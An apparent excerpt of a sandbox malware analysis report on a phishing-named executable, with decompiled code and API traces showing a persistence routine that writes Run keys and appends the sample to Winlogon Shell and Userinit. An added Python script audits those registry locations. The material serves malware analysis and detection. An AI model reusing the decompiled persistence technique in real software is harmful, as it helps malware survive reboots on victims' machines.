                                            • Part of subcall function 00408FDA: RegSetValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                            • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                            • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00406712,00410860,004157D0,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?,?,?,?,?,?,?,Ox@), ref: 004063A4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004063AE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004063CE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe, ,?,00410860,004157D0,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004063F0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Ox@), ref: 004063FB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(00000001,00000000), ref: 00406408
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406412
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406434
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040643D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406446
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe, ,?,00410860,004157D0,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 00406468
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406473
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00406480
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040648A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064AC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064B5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064BE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 00406502
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$??1?$basic_string@$V10@$V10@@$??0?$basic_string@D@1@@V10@0@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                          • String ID: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe$C:\WINDOWS\system32\userinit.exe, $Ox@$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Userinit$explorer.exe,
                                          • API String ID: 3158786748-3738466437
                                          • Opcode ID: 30b6fbe25face7c64cbd925131015d48c9dfd3434ba07a9143d2737ca0a7f8a4
                                          • Instruction ID: 3f221fffa98c3c74c31811f4ef3579c22c6f931b89917dd235009d3eae723281
                                          • Opcode Fuzzy Hash: 30b6fbe25face7c64cbd925131015d48c9dfd3434ba07a9143d2737ca0a7f8a4
                                          • Instruction Fuzzy Hash: A0417871D00219BBEB10BBA1DD4FEEF7F2DEB51314F00043AF90571182EAB95998C6A9
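The decompiled `E00406339` above is the persistence installer: depending on its flag arguments it writes the (quoted) executable path under `HKCU\...\CurrentVersion\Run`, `HKLM\...\CurrentVersion\Run` and `HKLM\...\Policies\Explorer\Run`, and prepends the stock loaders to the Winlogon values so they become `explorer.exe, "<path>"` (`Shell`) and `C:\WINDOWS\system32\userinit.exe, "<path>"` (`Userinit`). The check below is an added example, not code from the report or the sample: it audits those exact locations for extra comma-separated Winlogon entries, any `Policies\Explorer\Run` entry, and one target enrolled in several autostart locations at once, which is the signature this routine leaves. The registry dump is constructed (the value name `UpdateSvc` and the OneDrive control entry are hypothetical); on a live host the same dictionary would be filled from `winreg` or a `reg query` export.

```python
"""Audit Windows logon persistence for the edits made by E00406339.

Added example, not part of the Joe Sandbox report. SAMPLE_REGISTRY is a
constructed dump of the keys the decompiled routine writes; the value name
"UpdateSvc" and the OneDrive entry are hypothetical.
"""
from collections import defaultdict

WINLOGON = r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
RUN_KEYS = (
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
)
POLICY_RUN = RUN_KEYS[2]
# Stock values: Winlogon\Shell is just explorer.exe; Userinit is userinit.exe
# followed by a trailing comma. Anything else in the list is run at logon too.
EXPECTED_SHELL = {"explorer.exe"}
EXPECTED_USERINIT = {r"c:\windows\system32\userinit.exe"}

SAMPLE_PATH = r"C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe"
SAMPLE_REGISTRY = {  # constructed to mirror what the routine writes
    WINLOGON: {
        "Shell": f'explorer.exe, "{SAMPLE_PATH}"',
        "Userinit": f'C:\\WINDOWS\\system32\\userinit.exe, "{SAMPLE_PATH}"',
    },
    RUN_KEYS[0]: {
        "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
        "UpdateSvc": f'"{SAMPLE_PATH}"',
    },
    POLICY_RUN: {"UpdateSvc": f'"{SAMPLE_PATH}"'},
}


def split_list(value: str) -> list:
    """Split a comma-separated Winlogon value into normalised entries.
    Winlogon tolerates 'explorer.exe, C:\\x.exe'; quoting and spacing vary."""
    return [e.strip().strip('"').lower() for e in value.split(",") if e.strip()]


def first_token(cmd: str) -> str:
    """Executable path of a Run-key command line (quoted, or bare first token;
    an unquoted path containing spaces is cut at the first space)."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.find('"', 1)].lower()
    return cmd.split(" ", 1)[0].lower()


def audit(registry: dict) -> list:
    """Return human-readable findings for the autostart locations above."""
    findings = []
    seen = defaultdict(set)  # normalised target -> locations that launch it
    wl = registry.get(WINLOGON, {})
    for t in split_list(wl.get("Shell", "explorer.exe")):
        if t not in EXPECTED_SHELL:
            findings.append(f"Winlogon\\Shell extra entry: {t}")
            seen[t].add("Winlogon\\Shell")
    for t in split_list(wl.get("Userinit", r"C:\Windows\system32\userinit.exe,")):
        if t not in EXPECTED_USERINIT:
            findings.append(f"Winlogon\\Userinit extra entry: {t}")
            seen[t].add("Winlogon\\Userinit")
    for key in RUN_KEYS:
        for name, cmd in registry.get(key, {}).items():
            t = first_token(cmd)
            seen[t].add(key)
            # The policy Run key is almost never populated outside of GPO.
            if key == POLICY_RUN:
                findings.append(f"Policies\\Explorer\\Run entry '{name}': {t}")
    for t, locs in seen.items():
        if len(locs) > 1:
            findings.append(f"{t} enrolled in {len(locs)} autostart locations")
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_REGISTRY):
        print(f)
```

Remediation must restore `Shell` and `Userinit` to their defaults rather than delete them: removing `Userinit` entirely breaks interactive logon, which is exactly why malware prefers appending to it.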
                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,73115DF0), ref: 0040F05A
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F064
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F06D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                          • String ID:
                                          • API String ID: 3435050692-0
                                          • Opcode ID: b0a590d7568685fd502d2526f30560aa99c2d8ff11d0c264287033065e04a1e4
                                          • Instruction ID: 05261c11a0c2935763cb9f53f66ce9cc739fdea45f744e86f2ec5e7b64bf2302
                                          • Opcode Fuzzy Hash: b0a590d7568685fd502d2526f30560aa99c2d8ff11d0c264287033065e04a1e4
                                          • Instruction Fuzzy Hash: 6F31997150014AABCB14EFA1ED9DCDE7B79EE54305B108079F406A31A0EF75AF4ACB68
                                          C-Code - Quality: 80%
                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                          				CHAR* _v8;
                                          				intOrPtr* _v24;
                                          				intOrPtr _v28;
                                          				struct _STARTUPINFOA _v96;
                                          				int _v100;
                                          				char** _v104;
                                          				int _v108;
                                          				void _v112;
                                          				char** _v116;
                                          				intOrPtr* _v120;
                                          				intOrPtr _v124;
                                          				intOrPtr* _t23;
                                          				intOrPtr* _t24;
                                          				void* _t27;
                                          				void _t29;
                                          				intOrPtr _t36;
                                          				signed int _t38;
                                          				int _t40;
                                          				intOrPtr* _t41;
                                          				intOrPtr _t42;
                                          				intOrPtr _t46;
                                          				intOrPtr _t47;
                                          				intOrPtr _t49;
                                          				void* _t52;
                                          				intOrPtr* _t55;
                                          				intOrPtr _t58;
                                          				intOrPtr _t61;
                                          
                                          				_t52 = __edx;
                                          				_push(0xffffffff);
                                          				_push(0x411918);
                                          				_push(0x40fc60);
                                          				_push( *[fs:0x0]);
                                          				 *[fs:0x0] = _t58;
                                          				_v28 = _t58 - 0x68;
                                          				_v8 = 0;
                                          				__set_app_type(2);
                                          				 *0x415c1c =  *0x415c1c | 0xffffffff;
                                          				 *0x415c20 =  *0x415c20 | 0xffffffff;
                                          				_t23 = __p__fmode();
                                          				_t46 =  *0x415c14; // 0x0
                                          				 *_t23 = _t46;
                                          				_t24 = __p__commode();
                                          				_t47 =  *0x415c10; // 0x0
                                          				 *_t24 = _t47;
                                          				 *0x415c18 = _adjust_fdiv;
                                          				_t27 = E0040FF13( *_adjust_fdiv);
                                          				_t61 =  *0x415150; // 0x1
                                          				if(_t61 == 0) {
                                          					__setusermatherr(E0040FF10);
                                          					_pop(_t47);
                                          				}
                                          				E0040FEFE(_t27);
                                          				_push(0x4150a8);
                                          				_push(0x4150a4);
                                          				L0040FEF8();
                                          				_t29 =  *0x415c0c; // 0x0
                                          				_v112 = _t29;
                                          				__getmainargs( &_v100,  &_v116,  &_v104,  *0x415c08,  &_v112);
                                          				_push(0x4150a0);
                                          				_push(0x415000); // executed
                                          				L0040FEF8(); // executed
                                          				_t55 =  *_acmdln;
                                          				_v120 = _t55;
                                          				if( *_t55 != 0x22) {
                                          					while(1) {
                                          						__eflags =  *_t55 - 0x20;
                                          						if(__eflags <= 0) {
                                          							goto L7;
                                          						}
                                          						_t55 = _t55 + 1;
                                          						_v120 = _t55;
                                          					}
                                          				} else {
                                          					do {
                                          						_t55 = _t55 + 1;
                                          						_v120 = _t55;
                                          						_t42 =  *_t55;
                                          					} while (_t42 != 0 && _t42 != 0x22);
                                          					if( *_t55 == 0x22) {
                                          						L6:
                                          						_t55 = _t55 + 1;
                                          						_v120 = _t55;
                                          					}
                                          				}
                                          				L7:
                                          				_t36 =  *_t55;
                                          				if(_t36 != 0 && _t36 <= 0x20) {
                                          					goto L6;
                                          				}
                                          				_v96.dwFlags = 0;
                                          				GetStartupInfoA( &_v96);
                                          				_t69 = _v96.dwFlags & 0x00000001;
                                          				if((_v96.dwFlags & 0x00000001) == 0) {
                                          					_t38 = 0xa;
                                          				} else {
                                          					_t38 = _v96.wShowWindow & 0x0000ffff;
                                          				}
                                          				_t40 = E00407452(_t47, _t52, _t69, GetModuleHandleA(0), 0, _t55, _t38); // executed
                                          				_v108 = _t40;
                                          				exit(_t40);
                                          				_t41 = _v24;
                                          				_t49 =  *((intOrPtr*)( *_t41));
                                          				_v124 = _t49;
                                          				_push(_t41);
                                          				_push(_t49);
                                          				L0040FEF2();
                                          				return _t41;
                                          			}

                                          Instruction addresses: 0x0040fd88, 0x0040fd8b, 0x0040fd8d, 0x0040fd92, 0x0040fd9d, 0x0040fd9e, 0x0040fdab, 0x0040fdb0, 0x0040fdb5, 0x0040fdbc, 0x0040fdc3, 0x0040fdca, 0x0040fdd0, 0x0040fdd6, 0x0040fdd8, 0x0040fdde, 0x0040fde4, 0x0040fded, 0x0040fdf2, 0x0040fdf7, 0x0040fdfd, 0x0040fe04, 0x0040fe0a, 0x0040fe0a, 0x0040fe0b, 0x0040fe10, 0x0040fe15, 0x0040fe1a, 0x0040fe1f, 0x0040fe24, 0x0040fe3d, 0x0040fe43, 0x0040fe48, 0x0040fe4d, 0x0040fe5a, 0x0040fe5c, 0x0040fe62, 0x0040fe9e, 0x0040fe9e, 0x0040fea1, 0x00000000, 0x00000000, 0x0040fea3, 0x0040fea4, 0x0040fea4, 0x0040fe64, 0x0040fe64, 0x0040fe64, 0x0040fe65, 0x0040fe68, 0x0040fe6a, 0x0040fe75, 0x0040fe77, 0x0040fe77, 0x0040fe78, 0x0040fe78, 0x0040fe75, 0x0040fe7b, 0x0040fe7b, 0x0040fe7f, 0x00000000, 0x00000000, 0x0040fe85, 0x0040fe8c, 0x0040fe92, 0x0040fe96, 0x0040feab, 0x0040fe98, 0x0040fe98, 0x0040fe98, 0x0040feb7, 0x0040febc, 0x0040fec0, 0x0040fec6, 0x0040fecb, 0x0040fecd, 0x0040fed0, 0x0040fed1, 0x0040fed2, 0x0040fed9

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                          • String ID:
                                          • API String ID: 801014965-0
                                          • Opcode ID: b02d97d1e74cba480a13b512f3d40c3b2bbbec818edf6db353ae3fed4314c36b
                                          • Instruction ID: 8e1b74afc4b48038761e77c4c7ed844e3b6dc848ee47d0f1d3c708b4ab1b3d45
                                          • Opcode Fuzzy Hash: b02d97d1e74cba480a13b512f3d40c3b2bbbec818edf6db353ae3fed4314c36b
                                          • Instruction Fuzzy Hash: 474185B1840708DFC730DFA4D845ADA7BB8FB49710F20413BF551A76A1D7785885CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E00408FDA(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
                                          				char* _t13;
                                          				long _t15;
                                          				void* _t18;
                                          				int _t19;
                                          				void* _t25;
                                          
                                          				_t13 = RegCreateKeyA(_a4, _a8,  &_a8); // executed
                                          				if(_t13 != 0) {
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					return 0;
                                          				} else {
                                          					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					_t19 = 0;
                                          					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13); // executed
                                          					RegCloseKey(_a8);
                                          					if(_t15 == 0) {
                                          						_t19 = 1;
                                          					}
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					return _t19;
                                          				}
                                          			}

                                          Instruction addresses: 0x00408fe7, 0x00408fef, 0x0040903c, 0x00409045, 0x00408ff1, 0x00408ff6, 0x00409000, 0x00409007, 0x00409013, 0x0040901e, 0x00409026, 0x00409028, 0x00409028, 0x0040902d, 0x00409038, 0x00409038

                                          APIs
                                          • RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                          • RegSetValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                          • RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040903C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                          • String ID:
                                          • API String ID: 2159132150-0
                                          • Opcode ID: c96356cb78dfb9d80db60ec6b5f7434fb2546494d656b3e51b260e3425f17090
                                          • Instruction ID: da37749cfa3f05033a32fbbd08786c797a634bef9566a04a8c5ae3221e21c764
                                          • Opcode Fuzzy Hash: c96356cb78dfb9d80db60ec6b5f7434fb2546494d656b3e51b260e3425f17090
                                          • Instruction Fuzzy Hash: DA016932000009AFCF009F90FD889EA3B69FF18355B008075F90A92060DB729D64CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 23%
                                          			E00408EF1(intOrPtr _a4, void* _a8, char* _a12, char _a15, char* _a16) {
                                          				int _v8;
                                          				char _v1032;
                                          				long _t16;
                                          
                                          				_v8 = 0x400;
                                          				_t16 = RegOpenKeyExA(_a8, _a12, 0, 0x20019,  &_a8); // executed
                                          				if(_t16 != 0) {
                                          					_push( &_a15);
                                          					_push(0x410668);
                                          				} else {
                                          					RegQueryValueExA(_a8, _a16, 0, 0,  &_v1032,  &_v8); // executed
                                          					RegCloseKey(_a8);
                                          					_push( &_a15);
                                          					_push( &_v1032);
                                          				}
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                          				return _a4;
                                          			}

                                          Instruction addresses: 0x00408efd, 0x00408f12, 0x00408f1a, 0x00408f50, 0x00408f51, 0x00408f1c, 0x00408f31, 0x00408f3a, 0x00408f43, 0x00408f4a, 0x00408f4a, 0x00408f59, 0x00408f63

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                          • RegQueryValueExA.KERNELBASE(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                          • RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                          • String ID:
                                          • API String ID: 2462357041-0
                                          • Opcode ID: 6096438dd2eed9e4574e4a1dd84254fd0db2e199f98c401320f7f766a01d9ba8
                                          • Instruction ID: af5f393f80e90c15eb86e02cdebdcddb53bb09070e540c88b9aeee95ea817081
                                          • Opcode Fuzzy Hash: 6096438dd2eed9e4574e4a1dd84254fd0db2e199f98c401320f7f766a01d9ba8
                                          • Instruction Fuzzy Hash: CB01E4B510010EBFDB11DF50ED45FDA7B7DEB08704F508162BB19AA0A0D7B0AA59DB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00408E97(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
                                          				int _v8;
                                          				int _v12;
                                          				int _t14;
                                          				long _t16;
                                          				long _t20;
                                          
                                          				_t14 = 4;
                                          				_v8 = _t14;
                                          				_v12 = _t14;
                                          				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
                                          				if(_t16 != 0) {
                                          					return 0;
                                          				} else {
                                          					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8);
                                          					return RegCloseKey(_a8) & 0xffffff00 | _t20 == 0x00000000;
                                          				}
                                          			}

                                          Instruction addresses: 0x00408e9e, 0x00408e9f, 0x00408ea2, 0x00408eb6, 0x00408ebe, 0x00408ef0, 0x00408ec0, 0x00408ed4, 0x00408eec, 0x00408eec

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,00407538,00000000,00020019,00407538,?,?,?,00407538,80000001,00000000,?,?,?,?,004108CC), ref: 00408EB6
                                          • RegQueryValueExA.ADVAPI32(00407538,?,00000000,80000001,?,00000000,00000000,?,?,?,00407538,80000001,00000000), ref: 00408ED4
                                          • RegCloseKey.ADVAPI32(00407538,?,?,?,00407538,80000001,00000000,?,?,?,?,004108CC,00000000), ref: 00408EDF
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 6dddc39d83993ea91a79dd0c836d699722d7f7815938bb7eeb73e5aee30751c6
                                          • Instruction ID: 3bc629e04baa43d7f680f8c54f18a859d153aa5dc69768ea16728ed6502bf047
                                          • Opcode Fuzzy Hash: 6dddc39d83993ea91a79dd0c836d699722d7f7815938bb7eeb73e5aee30751c6
                                          • Instruction Fuzzy Hash: DFF01D76900218BFDF118F90ED05FDA7FB8EB08760F108166FA05EA150E7B1DA50EB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: __dllonexit_onexit
                                          • String ID:
                                          • API String ID: 2384194067-0
                                          • Opcode ID: 1dd30157baa608dde4cf9a423aca3e4198879557ea686d33491940c2b8cd9277
                                          • Instruction ID: 0fb8bc4dfdfd85fd3f376317f87d27c867fe4673c273a50aaea641c95b1bfcf4
                                          • Opcode Fuzzy Hash: 1dd30157baa608dde4cf9a423aca3e4198879557ea686d33491940c2b8cd9277
                                          • Instruction Fuzzy Hash: 83C0C930404B04EACA106B14FE065C97712A694B36BA0863AB465204F1A7790598E58D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 19%
                                          			E0040A71E(void* __eflags, void* __fp0, long _a4, char _a7) {
                                          				char _v20;
                                          				char _v36;
                                          				void* _v47;
                                          				char _v48;
                                          				char _v52;
                                          				char _v53;
                                          				char _v72;
                                          				char _v80;
                                          				void* _v84;
                                          				char _v85;
                                          				char _v104;
                                          				char _v120;
                                          				char _v136;
                                          				char _v152;
                                          				char _v168;
                                          				void _v176;
                                          				char _v192;
                                          				char _v208;
                                          				char _v224;
                                          				void* _v240;
                                          				char _v256;
                                          				void* _v396;
                                          				void* _v400;
                                          				struct _WIN32_FIND_DATAA _v720;
                                          				char _v1756;
                                          				void* _t312;
                                          				void* _t317;
                                          				signed char _t319;
                                          				signed char _t347;
                                          				signed char _t351;
                                          				signed char _t355;
                                          				signed char _t357;
                                          				signed char _t363;
                                          				signed char _t365;
                                          				signed char _t367;
                                          				signed char _t373;
                                          				void* _t381;
                                          				signed char _t383;
                                          				signed char _t385;
                                          				signed char _t387;
                                          				signed char _t389;
                                          				signed char _t397;
                                          				signed char _t399;
                                          				int _t400;
                                          				char* _t405;
                                          				signed char _t408;
                                          				signed char _t410;
                                          				void* _t421;
                                          				void* _t423;
                                          				void* _t428;
                                          				void* _t429;
                                          				void* _t432;
                                          				int _t434;
                                          				void* _t439;
                                          				signed int _t443;
                                          				signed char _t456;
